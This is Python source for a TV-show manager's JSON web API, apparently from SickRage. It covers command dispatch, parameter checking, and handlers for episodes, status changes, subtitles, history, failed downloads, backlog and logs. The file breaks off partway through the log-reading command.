from sickbeard import db, logger, ui, helpers
from sickbeard import search_queue
from sickbeard import image_cache
from sickbeard import classes
from sickbeard import processTV
from sickbeard import network_timezones, sbdatetime
from sickbeard.common import DOWNLOADED
from sickbeard.common import FAILED
from sickbeard.common import IGNORED
from sickbeard.common import Overview
from sickbeard.common import Quality
from sickbeard.common import SKIPPED
from sickbeard.common import SNATCHED
from sickbeard.common import SNATCHED_PROPER
from sickbeard.common import UNAIRED
from sickbeard.common import UNKNOWN
from sickbeard.common import WANTED
from sickbeard.common import ARCHIVED
from sickbeard.common import statusStrings
try:
import json
except ImportError:
# pylint: disable=F0401
import simplejson as json
# pylint: disable=F0401
from tornado.web import RequestHandler
indexer_ids = ["indexerid", "tvdbid"]
RESULT_SUCCESS = 10 # only use inside the run methods
RESULT_FAILURE = 20 # only use inside the run methods
RESULT_TIMEOUT = 30 # not used yet :(
RESULT_ERROR = 40 # only use outside of the run methods !
RESULT_FATAL = 50 # only use in Api.default() ! this is the "we encountered an internal error" error
RESULT_DENIED = 60 # only use in Api.default() ! this is the access denied error
result_type_map = {
RESULT_SUCCESS: "success",
RESULT_FAILURE: "failure",
RESULT_TIMEOUT: "timeout",
RESULT_ERROR: "error",
RESULT_FATAL: "fatal",
RESULT_DENIED: "denied",
}
# basically everything except RESULT_SUCCESS / success is bad
class ApiHandler(RequestHandler):
""" api class that returns json results """
version = 5 # use an int since float-point is unpredictable
def __init__(self, *args, **kwargs):
super(ApiHandler, self).__init__(*args, **kwargs)
# def set_default_headers(self):
# self.set_header('Cache-Control', 'no-store, no-cache, must-revalidate, max-age=0')
def get(self, *args, **kwargs):
kwargs = self.request.arguments
for arg, value in kwargs.iteritems():
if len(value) == 1:
kwargs[arg] = value[0]
args = args[1:]
# set the output callback
# default json
output_callback_dict = {
'default': self._out_as_json,
'image': self._out_as_image,
}
access_msg = u"API :: " + self.request.remote_ip + " - gave correct API KEY. ACCESS GRANTED"
logger.log(access_msg, logger.DEBUG)
# set the original call_dispatcher as the local _call_dispatcher
_call_dispatcher = self.call_dispatcher
# if profile was set wrap "_call_dispatcher" in the profile function
if 'profile' in kwargs:
from profilehooks import profile
_call_dispatcher = profile(_call_dispatcher, immediate=True)
del kwargs["profile"]
try:
out_dict = _call_dispatcher(args, kwargs)
except Exception, e: # real internal error oohhh nooo :(
logger.log(u"API :: " + ex(e), logger.ERROR)
error_data = {
"error_msg": ex(e),
"args": args,
"kwargs": kwargs
}
out_dict = _responds(RESULT_FATAL, error_data,
"SickRage encountered an internal error! Please report to the Devs")
if 'outputType' in out_dict:
output_callback = output_callback_dict[out_dict['outputType']]
else:
output_callback = output_callback_dict['default']
try:
self.finish(output_callback(out_dict))
except Exception:
pass
def _out_as_image(self, _dict):
self.set_header('Content-Type', _dict['image'].get_media_type())
return _dict['image'].get_media()
def _out_as_json(self, _dict):
self.set_header("Content-Type", "application/json;charset=UTF-8")
try:
out = json.dumps(_dict, ensure_ascii=False, sort_keys=True)
callback = self.get_query_argument('callback', None) or self.get_query_argument('jsonp', None)
if callback:
out = callback + '(' + out + ');' # wrap with JSONP call if requested
except Exception, e: # if we fail to generate the output fake an error
logger.log(u"API :: " + traceback.format_exc(), logger.DEBUG)
out = '{"result": "%s", "message": "error while composing output: %s"}' % \
(result_type_map[RESULT_ERROR], ex(e))
return out
def call_dispatcher(self, args, kwargs):
""" calls the appropriate CMD class
looks for a cmd in args and kwargs
or calls the TVDBShorthandWrapper when the first args element is a number
or returns an error that there is no such cmd
"""
logger.log(u"API :: all args: '" + str(args) + "'", logger.DEBUG)
logger.log(u"API :: all kwargs: '" + str(kwargs) + "'", logger.DEBUG)
commands = None
if args:
commands, args = args[0], args[1:]
commands = kwargs.pop("cmd", commands)
out_dict = {}
if commands:
commands = commands.split("|")
multi_commands = len(commands) > 1
for cmd in commands:
cur_args, cur_kwargs = self.filter_params(cmd, args, kwargs)
if len(cmd.split("_")) > 1:
cmd, cmd_index = cmd.split("_")
logger.log(u"API :: " + cmd + ": cur_kwargs " + str(cur_kwargs), logger.DEBUG)
if not (cmd in ('show.getbanner', 'show.getfanart', 'show.getnetworklogo', 'show.getposter') and
multi_commands): # skip these cmd while chaining
try:
if cmd in function_mapper:
func = function_mapper.get(cmd) # map function
func.rh = self # add request handler to function
cur_out_dict = func(cur_args, cur_kwargs).run() # call function and get response
elif _is_int(cmd):
cur_out_dict = TVDBShorthandWrapper(cur_args, cur_kwargs, cmd).run()
else:
cur_out_dict = _responds(RESULT_ERROR, "No such cmd: '" + cmd + "'")
except ApiError as error: # Api errors that we raised, they are harmless
cur_out_dict = _responds(RESULT_ERROR, msg=ex(error))
else: # if someone chained one of the forbidden commands they will get an error for this one cmd
cur_out_dict = _responds(RESULT_ERROR, msg="The cmd '" + cmd + "' is not supported while chaining")
if multi_commands:
# note: if duplicate commands are issued and one has an index defined it will override
# all others or the other way around, depending on the command order
# THIS IS NOT A BUG!
if cmd_index: # do we need an index dict for this cmd ?
if cmd not in out_dict:
out_dict[cmd] = {}
out_dict[cmd][cmd_index] = cur_out_dict
else:
out_dict[cmd] = cur_out_dict
else:
out_dict = cur_out_dict
if multi_commands: # if we had multiple commands we have to wrap it in a response dict
out_dict = _responds(RESULT_SUCCESS, out_dict)
else: # index / no cmd given
out_dict = CMD_SickBeard(args, kwargs).run()
return out_dict
def filter_params(self, cmd, args, kwargs):
""" return only params kwargs that are for cmd
and rename them to a clean version (remove "<cmd>_")
args are shared across all commands
all args and kwargs are lowered
cmd are separated by "|" e.g. &cmd=shows|future
kwargs are name-spaced with "." e.g. show.indexerid=101501
if a kwarg has no namespace asking it anyways (global)
full e.g.
/api?apikey=1234&cmd=show.seasonlist_asd|show.seasonlist_2&show.seasonlist_asd.indexerid=101501&show.seasonlist_2.indexerid=79488&sort=asc
two calls of show.seasonlist
one has the index "asd" the other one "2"
the "indexerid" kwargs / params have the indexed cmd as a namespace
and the kwarg / param "sort" is a used as a global
"""
cur_args = []
for arg in args:
cur_args.append(arg.lower())
cur_args = tuple(cur_args)
cur_kwargs = {}
for kwarg in kwargs:
if kwarg.find(cmd + ".") == 0:
clean_key = kwarg.rpartition(".")[2]
cur_kwargs[clean_key] = kwargs[kwarg].lower()
elif "." not in kwarg: # the kwarg was not name-spaced therefore a "global"
cur_kwargs[kwarg] = kwargs[kwarg]
return cur_args, cur_kwargs
class ApiCall(ApiHandler):
_help = {"desc": "This command is not documented. Please report this to the developers."}
def __init__(self, args, kwargs):
# missing
try:
if self._missing:
self.run = self.return_missing
except AttributeError:
pass
# help
if 'help' in kwargs:
self.run = self.return_help
def run(self):
# override with real output function in subclass
return {}
def return_help(self):
try:
if self._requiredParams:
pass
except AttributeError:
self._requiredParams = []
try:
if self._optionalParams:
pass
except AttributeError:
self._optionalParams = []
for paramDict, paramType in [(self._requiredParams, "requiredParameters"),
(self._optionalParams, "optionalParameters")]:
if paramType in self._help:
for paramName in paramDict:
if paramName not in self._help[paramType]:
self._help[paramType][paramName] = {}
if paramDict[paramName]["allowed_values"]:
self._help[paramType][paramName]["allowed_values"] = paramDict[paramName]["allowed_values"]
else:
self._help[paramType][paramName]["allowed_values"] = "see desc"
self._help[paramType][paramName]["defaultValue"] = paramDict[paramName]["defaultValue"]
self._help[paramType][paramName]["type"] = paramDict[paramName]["type"]
elif paramDict:
for paramName in paramDict:
self._help[paramType] = {}
self._help[paramType][paramName] = paramDict[paramName]
else:
self._help[paramType] = {}
msg = "No description available"
if "desc" in self._help:
msg = self._help["desc"]
return _responds(RESULT_SUCCESS, self._help, msg)
def return_missing(self):
if len(self._missing) == 1:
msg = "The required parameter: '" + self._missing[0] + "' was not set"
else:
msg = "The required parameters: '" + "','".join(self._missing) + "' where not set"
return _responds(RESULT_ERROR, msg=msg)
def check_params(self, args, kwargs, key, default, required, arg_type, allowed_values):
""" function to check passed params for the shorthand wrapper
and to detect missing/required params
"""
# auto-select indexer
if key in indexer_ids:
if "tvdbid" in kwargs:
key = "tvdbid"
self.indexer = indexer_ids.index(key)
missing = True
org_default = default
if arg_type == "bool":
allowed_values = [0, 1]
if args:
default = args[0]
missing = False
args = args[1:]
if kwargs.get(key):
default = kwargs.get(key)
missing = False
if required:
try:
self._missing
self._requiredParams.append(key)
except AttributeError:
self._missing = []
self._requiredParams = {key: {"allowed_values": allowed_values,
"defaultValue": org_default,
"type": arg_type}}
if missing and key not in self._missing:
self._missing.append(key)
else:
try:
self._optionalParams[key] = {"allowed_values": allowed_values,
"defaultValue": org_default,
"type": arg_type}
except AttributeError:
self._optionalParams = {key: {"allowed_values": allowed_values,
"defaultValue": org_default,
"type": arg_type}}
if default:
default = self._check_param_type(default, key, arg_type)
if arg_type == "bool":
arg_type = []
self._check_param_value(default, key, allowed_values)
return default, args
def _check_param_type(self, value, name, arg_type):
""" checks if value can be converted / parsed to arg_type
will raise an error on failure
or will convert it to arg_type and return new converted value
can check for:
- int: will be converted into int
- bool: will be converted to False / True
- list: will always return a list
- string: will do nothing for now
- ignore: will ignore it, just like "string"
"""
error = False
if arg_type == "int":
if _is_int(value):
value = int(value)
else:
error = True
elif arg_type == "bool":
if value in ("0", "1"):
value = bool(int(value))
elif value in ("true", "True", "TRUE"):
value = True
elif value in ("false", "False", "FALSE"):
value = False
elif value not in (True, False):
error = True
elif arg_type == "list":
value = value.split("|")
elif arg_type == "string":
pass
elif arg_type == "ignore":
pass
else:
logger.log(u'API :: Invalid param type: "%s" can not be checked. Ignoring it.' % str(arg_type), logger.ERROR)
if error:
# this is a real ApiError !!
raise ApiError(u'param "%s" with given value "%s" could not be parsed into "%s"'
% (str(name), str(value), str(arg_type)))
return value
def _check_param_value(self, value, name, allowed_values):
""" will check if value (or all values in it ) are in allowed values
will raise an exception if value is "out of range"
if bool(allowed_value) is False a check is not performed and all values are excepted
"""
if allowed_values:
error = False
if isinstance(value, list):
for item in value:
if item not in allowed_values:
error = True
else:
if value not in allowed_values:
error = True
if error:
# this is kinda a ApiError but raising an error is the only way of quitting here
raise ApiError(u"param: '" + str(name) + "' with given value: '" + str(
value) + "' is out of allowed range '" + str(allowed_values) + "'")
class TVDBShorthandWrapper(ApiCall):
_help = {"desc": "This is an internal function wrapper. Call the help command directly for more information."}
def __init__(self, args, kwargs, sid):
self.origArgs = args
self.kwargs = kwargs
self.sid = sid
self.s, args = self.check_params(args, kwargs, "s", None, False, "ignore", [])
self.e, args = self.check_params(args, kwargs, "e", None, False, "ignore", [])
self.args = args
ApiCall.__init__(self, args, kwargs)
def run(self):
""" internal function wrapper """
args = (self.sid,) + self.origArgs
if self.e:
return CMD_Episode(args, self.kwargs).run()
elif self.s:
return CMD_ShowSeasons(args, self.kwargs).run()
else:
return CMD_Show(args, self.kwargs).run()
# ###############################
# helper functions #
# ###############################
def _is_int(data):
try:
int(data)
except (TypeError, ValueError, OverflowError):
return False
else:
return True
def _rename_element(dict_obj, old_key, new_key):
try:
dict_obj[new_key] = dict_obj[old_key]
del dict_obj[old_key]
except (ValueError, TypeError, NameError):
pass
return dict_obj
def _responds(result_type, data=None, msg=""):
"""
result is a string of given "type" (success/failure/timeout/error)
message is a human readable string, can be empty
data is either a dict or a array, can be a empty dict or empty array
"""
return {"result": result_type_map[result_type],
"message": msg,
"data": {} if not data else data}
def _get_status_strings(s):
return statusStrings[s]
def _ordinal_to_datetime_form(ordinal):
# workaround for episodes with no air date
if int(ordinal) != 1:
date = datetime.date.fromordinal(ordinal)
else:
return ""
return date.strftime(dateTimeFormat)
def _ordinal_to_date_form(ordinal):
if int(ordinal) != 1:
date = datetime.date.fromordinal(ordinal)
else:
return ""
return date.strftime(dateFormat)
def _history_date_to_datetime_form(time_string):
date = datetime.datetime.strptime(time_string, History.date_format)
return date.strftime(dateTimeFormat)
def _map_quality(show_obj):
quality_map = _get_quality_map()
any_qualities = []
best_qualities = []
i_quality_id, a_quality_id = Quality.splitQuality(int(show_obj))
if i_quality_id:
for quality in i_quality_id:
any_qualities.append(quality_map[quality])
if a_quality_id:
for quality in a_quality_id:
best_qualities.append(quality_map[quality])
return any_qualities, best_qualities
def _get_quality_map():
return {Quality.SDTV: 'sdtv',
Quality.SDDVD: 'sddvd',
Quality.HDTV: 'hdtv',
Quality.RAWHDTV: 'rawhdtv',
Quality.FULLHDTV: 'fullhdtv',
Quality.HDWEBDL: 'hdwebdl',
Quality.FULLHDWEBDL: 'fullhdwebdl',
Quality.HDBLURAY: 'hdbluray',
Quality.FULLHDBLURAY: 'fullhdbluray',
Quality.UNKNOWN: 'unknown'}
def _get_root_dirs():
if sickbeard.ROOT_DIRS == "":
return {}
root_dir = {}
root_dirs = sickbeard.ROOT_DIRS.split('|')
default_index = int(sickbeard.ROOT_DIRS.split('|')[0])
root_dir["default_index"] = int(sickbeard.ROOT_DIRS.split('|')[0])
# remove default_index value from list (this fixes the offset)
root_dirs.pop(0)
if len(root_dirs) < default_index:
return {}
# clean up the list - replace %xx escapes by their single-character equivalent
root_dirs = [urllib.unquote_plus(x) for x in root_dirs]
default_dir = root_dirs[default_index]
dir_list = []
for root_dir in root_dirs:
valid = 1
try:
ek(os.listdir, root_dir)
except Exception:
valid = 0
default = 0
if root_dir is default_dir:
default = 1
cur_dir = {
'valid': valid,
'location': root_dir,
'default': default
}
dir_list.append(cur_dir)
return dir_list
class ApiError(Exception):
"""
Generic API error
"""
class IntParseError(Exception):
"""
A value could not be parsed into an int, but should be parse-able to an int
"""
# -------------------------------------------------------------------------------------#
class CMD_Help(ApiCall):
_help = {
"desc": "Get help about a given command",
"optionalParameters": {
"subject": {"desc": "The name of the command to get the help of"},
}
}
def __init__(self, args, kwargs):
# required
# optional
self.subject, args = self.check_params(args, kwargs, "subject", "help", False, "string", function_mapper.keys())
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get help about a given command """
if self.subject in function_mapper:
out = _responds(RESULT_SUCCESS, function_mapper.get(self.subject)((), {"help": 1}).run())
else:
out = _responds(RESULT_FAILURE, msg="No such cmd")
return out
class CMD_ComingEpisodes(ApiCall):
_help = {
"desc": "Get the coming episodes",
"optionalParameters": {
"sort": {"desc": "Change the sort order"},
"type": {"desc": "One or more categories of coming episodes, separated by |"},
"paused": {
"desc": "0 to exclude paused shows, 1 to include them, or omitted to use SickRage default value"
},
}
}
def __init__(self, args, kwargs):
# required
# optional
self.sort, args = self.check_params(args, kwargs, "sort", "date", False, "string", ComingEpisodes.sorts.keys())
self.type, args = self.check_params(args, kwargs, "type", '|'.join(ComingEpisodes.categories), False, "list",
ComingEpisodes.categories)
self.paused, args = self.check_params(args, kwargs, "paused", bool(sickbeard.COMING_EPS_DISPLAY_PAUSED), False,
"bool", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get the coming episodes """
grouped_coming_episodes = ComingEpisodes.get_coming_episodes(self.type, self.sort, True, self.paused)
data = {section: [] for section in grouped_coming_episodes.keys()}
for section, coming_episodes in grouped_coming_episodes.iteritems():
for coming_episode in coming_episodes:
data[section].append({
'airdate': coming_episode['airdate'],
'airs': coming_episode['airs'],
'ep_name': coming_episode['name'],
'ep_plot': coming_episode['description'],
'episode': coming_episode['episode'],
'indexerid': coming_episode['indexer_id'],
'network': coming_episode['network'],
'paused': coming_episode['paused'],
'quality': coming_episode['quality'],
'season': coming_episode['season'],
'show_name': coming_episode['show_name'],
'show_status': coming_episode['status'],
'tvdbid': coming_episode['tvdbid'],
'weekday': coming_episode['weekday']
})
return _responds(RESULT_SUCCESS, data)
class CMD_Episode(ApiCall):
_help = {
"desc": "Get detailed information about an episode",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
"season": {"desc": "The season number"},
"episode": {"desc": "The episode number"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
"full_path": {
"desc": "Return the full absolute show location (if valid, and True), or the relative show location"
},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
self.s, args = self.check_params(args, kwargs, "season", None, True, "int", [])
self.e, args = self.check_params(args, kwargs, "episode", None, True, "int", [])
# optional
self.fullPath, args = self.check_params(args, kwargs, "full_path", False, False, "bool", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get detailed information about an episode """
show_obj = Show.find(sickbeard.showList, int(self.indexerid))
if not show_obj:
return _responds(RESULT_FAILURE, msg="Show not found")
my_db = db.DBConnection(row_type="dict")
sql_results = my_db.select(
"SELECT name, description, airdate, status, location, file_size, release_name, subtitles FROM tv_episodes WHERE showid = ? AND episode = ? AND season = ?",
[self.indexerid, self.e, self.s])
if not len(sql_results) == 1:
raise ApiError("Episode not found")
episode = sql_results[0]
# handle path options
# absolute vs relative vs broken
show_path = None
try:
show_path = show_obj.location
except ShowDirectoryNotFoundException:
pass
if not show_path: # show dir is broken ... episode path will be empty
episode["location"] = ""
elif not self.fullPath:
# using the length because lstrip() removes to much
show_path_length = len(show_path) + 1 # the / or \ yeah not that nice i know
episode["location"] = episode["location"][show_path_length:]
# convert stuff to human form
if helpers.tryInt(episode['airdate'], 1) > 693595: # 1900
episode['airdate'] = sbdatetime.sbdatetime.sbfdate(sbdatetime.sbdatetime.convert_to_setting(
network_timezones.parse_date_time(int(episode['airdate']), show_obj.airs, show_obj.network)), d_preset=dateFormat)
else:
episode['airdate'] = 'Never'
status, quality = Quality.splitCompositeStatus(int(episode["status"]))
episode["status"] = _get_status_strings(status)
episode["quality"] = get_quality_string(quality)
episode["file_size_human"] = pretty_file_size(episode["file_size"])
return _responds(RESULT_SUCCESS, episode)
class CMD_EpisodeSearch(ApiCall):
_help = {
"desc": "Search for an episode. The response might take some time.",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
"season": {"desc": "The season number"},
"episode": {"desc": "The episode number"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
self.s, args = self.check_params(args, kwargs, "season", None, True, "int", [])
self.e, args = self.check_params(args, kwargs, "episode", None, True, "int", [])
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Search for an episode """
show_obj = Show.find(sickbeard.showList, int(self.indexerid))
if not show_obj:
return _responds(RESULT_FAILURE, msg="Show not found")
# retrieve the episode object and fail if we can't get one
ep_obj = show_obj.getEpisode(int(self.s), int(self.e))
if isinstance(ep_obj, str):
return _responds(RESULT_FAILURE, msg="Episode not found")
# make a queue item for it and put it on the queue
ep_queue_item = search_queue.ManualSearchQueueItem(show_obj, ep_obj)
sickbeard.searchQueueScheduler.action.add_item(ep_queue_item) # @UndefinedVariable
# wait until the queue item tells us whether it worked or not
while ep_queue_item.success is None: # @UndefinedVariable
time.sleep(1)
# return the correct json value
if ep_queue_item.success:
status, quality = Quality.splitCompositeStatus(ep_obj.status) # @UnusedVariable
# TODO: split quality and status?
return _responds(RESULT_SUCCESS, {"quality": get_quality_string(quality)},
"Snatched (" + get_quality_string(quality) + ")")
return _responds(RESULT_FAILURE, msg='Unable to find episode')
class CMD_EpisodeSetStatus(ApiCall):
_help = {
"desc": "Set the status of an episode or a season (when no episode is provided)",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
"season": {"desc": "The season number"},
"status": {"desc": "The status of the episode or season"}
},
"optionalParameters": {
"episode": {"desc": "The episode number"},
"force": {"desc": "True to replace existing downloaded episode or season, False otherwise"},
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
self.s, args = self.check_params(args, kwargs, "season", None, True, "int", [])
self.status, args = self.check_params(args, kwargs, "status", None, True, "string",
["wanted", "skipped", "ignored", "failed"])
# optional
self.e, args = self.check_params(args, kwargs, "episode", None, False, "int", [])
self.force, args = self.check_params(args, kwargs, "force", False, False, "bool", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Set the status of an episode or a season (when no episode is provided) """
show_obj = Show.find(sickbeard.showList, int(self.indexerid))
if not show_obj:
return _responds(RESULT_FAILURE, msg="Show not found")
# convert the string status to a int
for status in statusStrings:
if str(statusStrings[status]).lower() == str(self.status).lower():
self.status = status
break
else: # if we don't break out of the for loop we got here.
# the allowed values has at least one item that could not be matched against the internal status strings
raise ApiError("The status string could not be matched to a status. Report to Devs!")
ep_list = []
if self.e:
ep_obj = show_obj.getEpisode(self.s, self.e)
if not ep_obj:
return _responds(RESULT_FAILURE, msg="Episode not found")
ep_list = [ep_obj]
else:
# get all episode numbers from self, season
ep_list = show_obj.getAllEpisodes(season=self.s)
def _ep_result(result_code, ep, msg=""):
return {'season': ep.season, 'episode': ep.episode, 'status': _get_status_strings(ep.status),
'result': result_type_map[result_code], 'message': msg}
ep_results = []
failure = False
start_backlog = False
segments = {}
sql_l = []
for ep_obj in ep_list:
with ep_obj.lock:
if self.status == WANTED:
# figure out what episodes are wanted so we can backlog them
if ep_obj.season in segments:
segments[ep_obj.season].append(ep_obj)
else:
segments[ep_obj.season] = [ep_obj]
# don't let them mess up UN-AIRED episodes
if ep_obj.status == UNAIRED:
if self.e is not None: # setting the status of an un-aired is only considered a failure if we directly wanted this episode, but is ignored on a season request
ep_results.append(
_ep_result(RESULT_FAILURE, ep_obj, "Refusing to change status because it is UN-AIRED"))
failure = True
continue
if self.status == FAILED and not sickbeard.USE_FAILED_DOWNLOADS:
ep_results.append(_ep_result(RESULT_FAILURE, ep_obj, "Refusing to change status to FAILED because failed download handling is disabled"))
failure = True
continue
# allow the user to force setting the status for an already downloaded episode
if ep_obj.status in Quality.DOWNLOADED + Quality.ARCHIVED and not self.force:
ep_results.append(_ep_result(RESULT_FAILURE, ep_obj, "Refusing to change status because it is already marked as DOWNLOADED"))
failure = True
continue
ep_obj.status = self.status
sql_l.append(ep_obj.get_sql())
if self.status == WANTED:
start_backlog = True
ep_results.append(_ep_result(RESULT_SUCCESS, ep_obj))
if len(sql_l) > 0:
my_db = db.DBConnection()
my_db.mass_action(sql_l)
extra_msg = ""
if start_backlog:
for season, segment in segments.iteritems():
cur_backlog_queue_item = search_queue.BacklogQueueItem(show_obj, segment)
sickbeard.searchQueueScheduler.action.add_item(cur_backlog_queue_item) # @UndefinedVariable
logger.log(u"API :: Starting backlog for " + show_obj.name + " season " + str(
season) + " because some episodes were set to WANTED")
extra_msg = " Backlog started"
if failure:
return _responds(RESULT_FAILURE, ep_results, 'Failed to set all or some status. Check data.' + extra_msg)
else:
return _responds(RESULT_SUCCESS, msg='All status set successfully.' + extra_msg)
class CMD_SubtitleSearch(ApiCall):
_help = {
"desc": "Search for an episode subtitles. The response might take some time.",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
"season": {"desc": "The season number"},
"episode": {"desc": "The episode number"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
self.s, args = self.check_params(args, kwargs, "season", None, True, "int", [])
self.e, args = self.check_params(args, kwargs, "episode", None, True, "int", [])
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Search for an episode subtitles """
show_obj = Show.find(sickbeard.showList, int(self.indexerid))
if not show_obj:
return _responds(RESULT_FAILURE, msg="Show not found")
# retrieve the episode object and fail if we can't get one
ep_obj = show_obj.getEpisode(int(self.s), int(self.e))
if isinstance(ep_obj, str):
return _responds(RESULT_FAILURE, msg="Episode not found")
# try do download subtitles for that episode
previous_subtitles = ep_obj.subtitles
try:
subtitles = ep_obj.download_subtitles()
except Exception:
return _responds(RESULT_FAILURE, msg='Unable to find subtitles')
# return the correct json value
new_subtitles = frozenset(ep_obj.subtitles).difference(previous_subtitles)
if new_subtitles:
new_languages = [subtitles.name_from_code(code) for code in new_subtitles]
status = 'New subtitles downloaded: %s' % ', '.join(new_languages)
response = _responds(RESULT_SUCCESS, msg='New subtitles found')
else:
status = 'No subtitles downloaded'
response = _responds(RESULT_FAILURE, msg='Unable to find subtitles')
ui.notifications.message('Subtitles Search', status)
return response
class CMD_Exceptions(ApiCall):
_help = {
"desc": "Get the scene exceptions for all or a given show",
"optionalParameters": {
"indexerid": {"desc": "Unique ID of a show"},
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
# optional
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, False, "int", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get the scene exceptions for all or a given show """
my_db = db.DBConnection("cache.db", row_type="dict")
if self.indexerid is None:
sql_results = my_db.select("SELECT show_name, indexer_id AS 'indexerid' FROM scene_exceptions")
scene_exceptions = {}
for row in sql_results:
indexerid = row["indexerid"]
if indexerid not in scene_exceptions:
scene_exceptions[indexerid] = []
scene_exceptions[indexerid].append(row["show_name"])
else:
show_obj = Show.find(sickbeard.showList, int(self.indexerid))
if not show_obj:
return _responds(RESULT_FAILURE, msg="Show not found")
sql_results = my_db.select(
"SELECT show_name, indexer_id AS 'indexerid' FROM scene_exceptions WHERE indexer_id = ?",
[self.indexerid])
scene_exceptions = []
for row in sql_results:
scene_exceptions.append(row["show_name"])
return _responds(RESULT_SUCCESS, scene_exceptions)
class CMD_History(ApiCall):
_help = {
"desc": "Get the downloaded and/or snatched history",
"optionalParameters": {
"limit": {"desc": "The maximum number of results to return"},
"type": {"desc": "Only get some entries. No value will returns every type"},
}
}
def __init__(self, args, kwargs):
# required
# optional
self.limit, args = self.check_params(args, kwargs, "limit", 100, False, "int", [])
self.type, args = self.check_params(args, kwargs, "type", None, False, "string", ["downloaded", "snatched"])
self.type = self.type.lower() if isinstance(self.type, str) else ''
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get the downloaded and/or snatched history """
data = History().get(self.limit, self.type)
results = []
for row in data:
status, quality = Quality.splitCompositeStatus(int(row["action"]))
status = _get_status_strings(status)
if self.type and not status.lower() == self.type:
continue
row["status"] = status
row["quality"] = get_quality_string(quality)
row["date"] = _history_date_to_datetime_form(str(row["date"]))
del row["action"]
_rename_element(row, "show_id", "indexerid")
row["resource_path"] = ek(os.path.dirname, row["resource"])
row["resource"] = ek(os.path.basename, row["resource"])
# Add tvdbid for backward compatibility
row['tvdbid'] = row['indexerid']
results.append(row)
return _responds(RESULT_SUCCESS, results)
class CMD_HistoryClear(ApiCall):
_help = {"desc": "Clear the entire history"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Clear the entire history """
History().clear()
return _responds(RESULT_SUCCESS, msg="History cleared")
class CMD_HistoryTrim(ApiCall):
_help = {"desc": "Trim history entries older than 30 days"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Trim history entries older than 30 days """
History().trim()
return _responds(RESULT_SUCCESS, msg='Removed history entries older than 30 days')
class CMD_Failed(ApiCall):
_help = {
"desc": "Get the failed downloads",
"optionalParameters": {
"limit": {"desc": "The maximum number of results to return"},
}
}
def __init__(self, args, kwargs):
# required
# optional
self.limit, args = self.check_params(args, kwargs, "limit", 100, False, "int", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get the failed downloads """
my_db = db.DBConnection('failed.db', row_type="dict")
u_limit = min(int(self.limit), 100)
if u_limit == 0:
sql_results = my_db.select("SELECT * FROM failed")
else:
sql_results = my_db.select("SELECT * FROM failed LIMIT ?", [u_limit])
return _responds(RESULT_SUCCESS, sql_results)
class CMD_Backlog(ApiCall):
_help = {"desc": "Get the backlogged episodes"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get the backlogged episodes """
shows = []
my_db = db.DBConnection(row_type="dict")
for curShow in sickbeard.showList:
show_eps = []
sql_results = my_db.select(
"SELECT tv_episodes.*, tv_shows.paused FROM tv_episodes INNER JOIN tv_shows ON tv_episodes.showid = tv_shows.indexer_id WHERE showid = ? and paused = 0 ORDER BY season DESC, episode DESC",
[curShow.indexerid])
for curResult in sql_results:
cur_ep_cat = curShow.getOverview(int(curResult["status"] or -1))
if cur_ep_cat and cur_ep_cat in (Overview.WANTED, Overview.QUAL):
show_eps.append(curResult)
if show_eps:
shows.append({
"indexerid": curShow.indexerid,
"show_name": curShow.name,
"status": curShow.status,
"episodes": show_eps
})
return _responds(RESULT_SUCCESS, shows)
class CMD_Logs(ApiCall):
_help = {
"desc": "Get the logs",
"optionalParameters": {
"min_level": {
"desc":
"The minimum level classification of log entries to return. "
"Each level inherits its above levels: debug < info < warning < error"
},
}
}
def __init__(self, args, kwargs):
# required
# optional
self.min_level, args = self.check_params(args, kwargs, "min_level", "error", False, "string",
["error", "warning", "info", "debug"])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get the logs """
# 10 = Debug / 20 = Info / 30 = Warning / 40 = Error
min_level = logger.reverseNames[str(self.min_level).upper()]
data = []
if ek(os.path.isfile, logger.logFile):
with io.open(logger.logFile, 'r', encoding='utf-8') as f:
data = f.readlines()
regex = r"^(\d\d\d\d)\-(\d\d)\-(\d\d)\s*(\d\d)\:(\d\d):(\d\d)\s*([A-Z]+)\s*(.+?)\s*\:\:\s*(.*)$"
final_data = []
num_lines = 0
last_line = False
num_to_show = min(50, len(data))
for x in reversed(data):
match = re.match(regex, x)
if match:
level = match.group(7)
if level not in logger.reverseNames:
last_line = False
continue
if logger.reverseNames[level] >= min_level:
last_line = True
final_data.append(x.rstrip("\n"))
else:
last_line = False
continue
